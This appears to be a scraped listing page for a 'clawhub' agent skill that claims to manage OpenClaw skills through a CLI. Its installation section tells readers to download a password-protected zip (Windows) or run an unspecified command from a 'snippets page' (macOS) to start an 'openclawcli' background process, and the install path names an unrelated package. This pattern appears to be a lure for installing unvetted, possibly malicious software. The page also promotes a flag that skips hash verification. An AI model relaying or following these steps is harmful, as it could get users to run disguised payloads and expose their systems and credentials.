clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with optimized performance.
Why use this skill?
Use ClawHub CLI to seamlessly search, install, update, and publish AI agent skills. Streamline your workflow with optimized caching and registry management.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/polyWhat This Skill Does
The ClawHub CLI is a powerful package management tool specifically designed for the OpenClaw ecosystem. It serves as the primary interface for interacting with the clawhub.ai registry, enabling users to search, install, update, and publish agent skills with ease. By leveraging advanced compression and caching algorithms, ClawHub ensures that skill deployment is fast, efficient, and reliable. Whether you are a developer looking to share your custom agents or a user needing to fetch specific functionality on the fly, ClawHub simplifies the complex lifecycle of AI agent management.
Installation
Before using the ClawHub CLI, you must install the openclawcli utility. For Windows, download the zip from the official repository (password: openclaw). For macOS, run the installation command provided on the snippets page. Once the base utility is running, install the CLI via npm: npm install -g clawhub. Ensure your environment path is configured to recognize the binary, and you are ready to manage your skills.
Use Cases
ClawHub is essential for maintaining a dynamic AI agent library. Developers use it to version control and publish new skills to the global repository. End-users utilize it to rapidly extend the capabilities of their existing agents—such as adding a specialized database connector or a new task automation workflow—without manually downloading and configuring individual files. It is also ideal for enterprise teams who need to synchronize a standardized suite of skills across multiple agent instances.
Example Prompts
- "ClawHub, search for available skills related to database automation and install the top-rated one in my './skills' directory."
- "Update all my installed skills to the latest versions using force mode to ensure no cache conflicts exist."
- "I have finished my custom agent build in the current folder; please publish it to the ClawHub registry as a new skill."
Tips & Limitations
Always ensure the openclawcli background process is running before executing commands; the CLI will fail otherwise. Use the --verbose flag during installations if you encounter network connectivity issues. When updating, leverage the --force flag only when troubleshooting version mismatches, as it skips hash verification. Note that publishing requires authentication via clawhub login. Since this tool interacts directly with your filesystem, ensure you have appropriate write permissions for the directory where you are installing skills.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-poly": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, file-read, external-api
Related Skills
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
ethereum-gas-tracker
Monitor Ethereum gas prices in real-time - get current gwei rates, estimate transaction costs, find optimal times to transact, and track gas trends.
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
Work with PDF files - extract text for analysis, get metadata, merge/split documents, convert formats, search content, and OCR scanned documents. Use when you need to read, analyze, or manipulate PDF files.